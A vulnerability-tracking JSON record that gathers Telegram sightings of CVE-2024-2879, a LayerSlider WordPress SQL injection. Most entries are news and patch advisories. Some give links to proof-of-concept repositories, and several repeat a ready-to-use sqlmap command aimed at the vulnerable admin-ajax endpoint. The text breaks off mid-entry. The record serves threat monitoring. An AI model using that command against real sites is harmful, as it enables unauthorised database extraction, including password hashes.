{"vulnerability": "cve-2024-2879", "sightings": [{"uuid": "184325f1-0af7-423c-b075-313601440698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/4472", "content": "#exploit\n1. Zero-Click Calendar invite - Critical 0-click vulnerability chain in macOS (CVE-2022-46723)\nhttps://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b\n\n2. CVE-2024-2879:\nWP LayerSlider - Unauth SQLI\nhttps://github.com/herculeszxc/CVE-2024-2879", "creation_timestamp": "2024-09-19T15:13:51.000000Z"}, {"uuid": "67e70162-ffdb-4ffb-8cc5-42decba14001", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/cKure/12675", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Critical Security Flaw Exposes 1 Million WordPress Sites to SQL Injection.\n\nA researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.\n\nhttps://www.darkreading.com/remote-workforce/critical-security-flaw-wordpress-sql-injection", "creation_timestamp": "2024-04-04T19:43:09.000000Z"}, {"uuid": "e2160ad6-494e-44fa-b693-f2ea3c9201ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/4863", "content": "The Hacker News\nCritical Security Flaw Found in Popular LayerSlider WordPress Plugin\n\nA critical security flaw impacting the LayerSlider plugin for WordPress could be abused to extract sensitive information from databases, such as password hashes.\nThe flaw, designated as&nbsp;CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.\nThe issue has been addressed in version", "creation_timestamp": "2024-04-03T11:27:29.000000Z"}, {"uuid": "4de1abce-bbd1-4a96-a921-8992b41a158e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/arpsyndicate/4435", "content": "#ExploitObserverAlert\n\nCVE-2024-2879\n\nDESCRIPTION: Exploit Observer has 32 entries in 8 file formats related to CVE-2024-2879. The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n\nFIRST-EPSS: 0.000000000\nNVD-IS: 3.6\nNVD-ES: 3.9", "creation_timestamp": "2024-04-10T11:51:47.000000Z"}, {"uuid": "2239d36d-9236-438d-8ce8-db3371587443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/FAD_Hack/1027", "content": "CVE-2024-2879 auto scaner &amp; have exploit in exploit.txt\nDownloads:\nhttps://github.com/RF313TEAM/Alien-exploit.git", "creation_timestamp": "2024-07-07T08:30:17.000000Z"}, {"uuid": "52aefc46-f7bb-4ed8-8b9e-3441b25058a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/tengkorakcybercrewz/918", "content": "The Hacker News\nCritical Security Flaw Found in Popular LayerSlider WordPress Plugin\n\nA critical security flaw impacting the LayerSlider plugin for WordPress could be abused to extract sensitive information from databases, such as password hashes.\nThe flaw, designated as&nbsp;CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.\nThe issue has been addressed in version", "creation_timestamp": "2024-04-03T11:27:29.000000Z"}, {"uuid": "65848723-e3bc-40ff-8d12-8747e04fc68c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/KomunitiSiber/1725", "content": "Critical Security Flaw Found in Popular LayerSlider WordPress Plugin\nhttps://thehackernews.com/2024/04/critical-security-flaw-found-in-popular.html\n\nA critical security flaw impacting the LayerSlider plugin for WordPress could be abused to extract sensitive information from databases, such as password hashes.\nThe flaw, designated as\u00a0CVE-2024-2879, carries a CVSS score of 9.8 out of a maximum of 10.0. It has been described as a case of SQL injection impacting versions from 7.9.11 through 7.10.0.\nThe issue has been addressed in version", "creation_timestamp": "2024-04-03T08:03:11.000000Z"}, {"uuid": "a1376915-13c5-4352-acec-1741967f7ea4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/true_secator/5598", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c SQL-\u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438 \u0432 \u043f\u043b\u0430\u0433\u0438\u043d\u0435 LayerSlider \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u044b \u0441\u0430\u0439\u0442\u043e\u0432 WordPress, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u0431\u0430\u0437 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0445\u044d\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439.\n\n\u0428\u0438\u0440\u043e\u043a\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 LayerSlider \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u0438\u0437\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0432\u0435\u0431-\u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0430, \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b \u0446\u0438\u0444\u0440\u043e\u0432\u044b\u0445 \u0432\u0438\u0437\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u044d\u0444\u0444\u0435\u043a\u0442\u043e\u0432 \u0438 \u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0434\u0438\u0437\u0430\u0439\u043d\u0430 \u0432 \u043e\u0434\u043d\u043e\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2024-2879 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0438\u043c\u0435\u0435\u0442 \u043e\u0446\u0435\u043d\u043a\u0443 CVSS 9,8 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u0438\u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 \u0440\u0430\u0437\u043c\u0435\u0442\u043a\u0438 \u0432\u0441\u043f\u043b\u044b\u0432\u0430\u044e\u0449\u0438\u0445 \u043e\u043a\u043e\u043d.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 7.9.11 \u0438 7.10.0.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c Wordfence, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u044b\u043c \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0437\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0438 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435\u043c wpdb::prepare().\n\n\u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0442\u044c \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e.\n\nCVE-2024-2879 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 BugBounty, \u0437\u0430 \u0447\u0442\u043e \u0441\u043e\u043e\u0431\u0449\u0438\u0432\u0448\u0438\u0439 \u043e \u043d\u0435\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u0432\u043e\u0437\u043d\u0430\u0433\u0440\u0430\u0436\u0434\u0435\u043d\u0438\u0435 \u0432 \u0440\u0430\u0437\u043c\u0435\u0440\u0435 5500 \u0434\u043e\u043b\u043b\u0430\u0440\u043e\u0432.\n\nWordfence \u0443\u0432\u0435\u0434\u043e\u043c\u0438\u043b\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043f\u043b\u0430\u0433\u0438\u043d\u0430 25 \u043c\u0430\u0440\u0442\u0430, \u0430 27 \u043c\u0430\u0440\u0442\u0430 \u0431\u044b\u043b\u0430 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f LayerSlider 7.10.1 \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435.", "creation_timestamp": "2024-04-03T18:00:07.000000Z"}, {"uuid": "4970c7e8-6d0d-417b-98cd-65fee327d4d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/pro_8tech/1426", "content": "\u200f\u0627\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062e\u062f\u0645 \u0627\u0636\u0627\u0641\u0647 LayerSlider \u0641\u064a \u0645\u062f\u0648\u0646\u0647 WordPress \n\u0642\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0641\u0648\u0631\u0627\u064b \u0644\u0627\u0635\u062f\u0627\u0631 7.10.1 \u0644\u0648\u062c\u0648\u062f \u062b\u063a\u0631\u0647 SQLi \u062e\u0637\u064a\u0631\u0647\n\n\u0631\u0642\u0645 \u0627\u0644\u062b\u063a\u0631\u0647 : CVE-2024-2879\n\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0648\u0631\u0647 : 9.8\n\n\u3030\ufe0f\u2796\u2796\u2796\u2796\u2796\u2796\u3030\ufe0f\n\nt.me/MuhammadAlush0997\n\n\u062a\u0627\u0628\u0639\u0646\u064a \u0639\u0644\u0649 :\nTelegram | instagram | facebook | Twitter | YouTube", "creation_timestamp": "2024-04-04T18:36:27.000000Z"}, {"uuid": "a4c868a1-8229-43a7-afce-d0a3378a9b83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/MuhammadAlush0997/487", "content": "\u200f\u0627\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062e\u062f\u0645 \u0627\u0636\u0627\u0641\u0647 LayerSlider \u0641\u064a \u0645\u062f\u0648\u0646\u0647 WordPress \n\u0642\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0641\u0648\u0631\u0627\u064b \u0644\u0627\u0635\u062f\u0627\u0631 7.10.1 \u0644\u0648\u062c\u0648\u062f \u062b\u063a\u0631\u0647 SQLi \u062e\u0637\u064a\u0631\u0647\n\n\u0631\u0642\u0645 \u0627\u0644\u062b\u063a\u0631\u0647 : CVE-2024-2879\n\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0648\u0631\u0647 : 9.8\n\n\u3030\ufe0f\u2796\u2796\u2796\u2796\u2796\u2796\u3030\ufe0f\n\nt.me/MuhammadAlush0997\n\n\u062a\u0627\u0628\u0639\u0646\u064a \u0639\u0644\u0649 :\nTelegram | instagram | facebook | Twitter | YouTube", "creation_timestamp": "2024-04-04T18:35:57.000000Z"}, {"uuid": "8d4cc094-7223-44e2-95f5-7032be212e42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "Telegram/KQt3AsBMUv9rm4uNMEtvLFjsfOosJKxmDQL0jQWpInK2LtGCng", "content": "", "creation_timestamp": "2025-01-31T21:40:22.000000Z"}, {"uuid": "49b17316-93b4-42e1-84c4-6f5399a821d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/MuhammadAlush0997/82455", "content": "\u200f\u0627\u0630\u0627 \u0643\u0646\u062a \u062a\u0633\u062e\u062f\u0645 \u0627\u0636\u0627\u0641\u0647 LayerSlider \u0641\u064a \u0645\u062f\u0648\u0646\u0647 WordPress \n\u0642\u0645 \u0628\u0627\u0644\u062a\u062d\u062f\u064a\u062b \u0641\u0648\u0631\u0627\u064b \u0644\u0627\u0635\u062f\u0627\u0631 7.10.1 \u0644\u0648\u062c\u0648\u062f \u062b\u063a\u0631\u0647 SQLi \u062e\u0637\u064a\u0631\u0647\n\n\u0631\u0642\u0645 \u0627\u0644\u062b\u063a\u0631\u0647 : CVE-2024-2879\n\u0645\u0633\u062a\u0648\u0649 \u0627\u0644\u062e\u0637\u0648\u0631\u0647 : 9.8\n\n\u3030\ufe0f\u2796\u2796\u2796\u2796\u2796\u2796\u3030\ufe0f\n\nt.me/MuhammadAlush0997\n\n\u062a\u0627\u0628\u0639\u0646\u064a \u0639\u0644\u0649 :\nTelegram | instagram | facebook | Twitter | YouTube", "creation_timestamp": "2024-04-04T18:35:57.000000Z"}, {"uuid": "6c4f7221-9425-4b6c-83fa-3f9683e4821c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6986", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-2879 - LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection\nURL\uff1ahttps://github.com/herculeszxc/CVE-2024-2879\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-08T18:53:32.000000Z"}, {"uuid": "641fae2b-9bc1-4f58-b8ba-23c3847c8493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/Idi0tSecMarket/21", "content": "CVE-2024-2879|CVE-2023-5360|CVE-2023-4666\n\nWordPress Plugin Vuln Scanner\n-@Salvador1337", "creation_timestamp": "2025-04-07T11:02:22.000000Z"}, {"uuid": "7832e17e-f1ca-4649-a9e7-08223b7656d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/3863", "content": "#exploit\n1. Zero-Click Calendar invite - Critical 0-click vulnerability chain in macOS (CVE-2022-46723)\nhttps://mikko-kenttala.medium.com/zero-click-calendar-invite-critical-zero-click-vulnerability-chain-in-macos-a7a434fc887b\n\n2. CVE-2024-2879:\nWP LayerSlider - Unauth SQLI\nhttps://github.com/herculeszxc/CVE-2024-2879", "creation_timestamp": "2024-09-19T10:18:53.000000Z"}, {"uuid": "fa777580-14e0-4ceb-846d-51188fb19ab4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "Telegram/bPpIzVMoOipVeU0DORa9cddge4YcVIyGvqMhGa6eE8iCYfts", "content": "", "creation_timestamp": "2024-04-04T18:36:16.000000Z"}, {"uuid": "e9e58c58-3352-42fa-a492-44be03cc19e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-28796", "type": "seen", "source": "https://t.me/cvedetector/1119", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-28796 - IBM ClearQuest Stored Cross-Site Scripting Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-28796 \nPublished : July 17, 2024, 7:15 p.m. | 15\u00a0minutes ago \nDescription : IBM ClearQuest (CQ) 9.1 through 9.1.0.6 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  IBM X-Force ID:  286833. \nSeverity: 6.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"17 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-17T21:34:19.000000Z"}, {"uuid": "722fc1c3-5e27-44d0-85aa-ff3aa6f78f9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "Telegram/9Xhmw-rZWR2o6dsD4qW1tyIylMQ98qFP2H2T28iBGtIo9w", "content": "", "creation_timestamp": "2024-04-03T11:27:29.000000Z"}, {"uuid": "10977f5e-ce3d-4ce8-b6ea-9250a200e463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/CyperNews/66", "content": "\ud83d\udd3a \u062a\u0645 \u0627\u0643\u062a\u0634\u0627\u0641 \u062b\u063a\u0631\u0629 SQL injectiton \u0641\u064a \u0627\u0646\u0636\u0645\u0629 wordpress \u0648\u062a\u0639\u062a\u0628\u0631 \u0647\u0630\u0647 \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0646 \u0646\u0648\u0639 zero day \n\u0631\u0642\u0645 CVE : \nCVE-2024-2879\n\n\ud83d\udd3a A critical SQL injection flaw in the wordpress system\n\nCVE Number :\n (CVE-2024-2879)\n\n#CyperNews", "creation_timestamp": "2024-06-10T14:10:49.000000Z"}, {"uuid": "ef994edc-4dab-491a-ab36-b4a3f80f13af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/intell137/83", "content": "CVE-2024-2879 LayerSlider \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress\n*\n\u0412\u0435\u0440\u0441\u0438\u0438 LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection\n*\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0435 \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c, \u043a\u0430\u043a \u0438\u0442\u043e\u0433 = \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC usage:\nsqlmap \"https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&amp;id[where]=\" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T\n\n\n#wordpress", "creation_timestamp": "2024-04-09T23:44:34.000000Z"}, {"uuid": "988420a8-45da-4470-bdf0-4d3100bf9d85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "Telegram/GWclR4lwnKWM1qqmFeFP56VYm_D6urSFgdQE3xqOMp6HZQ", "content": "", "creation_timestamp": "2024-04-03T11:07:48.000000Z"}, {"uuid": "6cbb6ada-0cb2-47fb-945f-d247e37a2059", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "seen", "source": "https://t.me/arpsyndicate/4930", "content": "#ExploitObserverAlert\n\nCVE-2024-2879\n\nDESCRIPTION: Exploit Observer has 31 entries in 7 file formats related to CVE-2024-2879. The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n\nFIRST-EPSS: 0.004920000\nNVD-IS: 3.6\nNVD-ES: 3.9\nARPS-PRIORITY: 0.9594176", "creation_timestamp": "2024-05-05T20:17:30.000000Z"}, {"uuid": "8595f60a-50a4-40b5-a98b-13ccc82f5942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/124661", "content": "CVE-2024-2879 LayerSlider \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress\n*\n\u0412\u0435\u0440\u0441\u0438\u0438 LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection\n*\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0435 \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c, \u043a\u0430\u043a \u0438\u0442\u043e\u0433 = \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0438\u0437 \u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445.\n*\nPOC usage:\nsqlmap \"https:://OLOLO.com/wp-admin/admin-ajax.php?action=ls_get_popup_markup&amp;id[where]=\" --risk=3 --level=4 --dbms=mysql --technique=T or sqlmap -r request.txt --risk=3 --level=4 --dbms=mysql --technique=T\n\n\n#wordpress", "creation_timestamp": "2024-04-09T22:32:45.000000Z"}, {"uuid": "2b4e2d83-7ae5-458d-8077-ed79cfc54230", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-2879", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/258", "content": "CVE-2024-2879 LayerSlider \u043f\u043b\u0430\u0433\u0438\u043d \u0434\u043b\u044f WordPress\n*\n\u0412\u0435\u0440\u0441\u0438\u0438 LayerSlider 7.9.11 - 7.10.0 - Unauthenticated SQL Injection\n*\n\u041d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u0435 \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 SQL-\u0437\u0430\u043f\u0440\u043e\u0441\u044b \u043a \u0443\u0436\u0435 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c, \u043a\u0430\u043a \u0438\u0442\u043e\u0433 = \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f 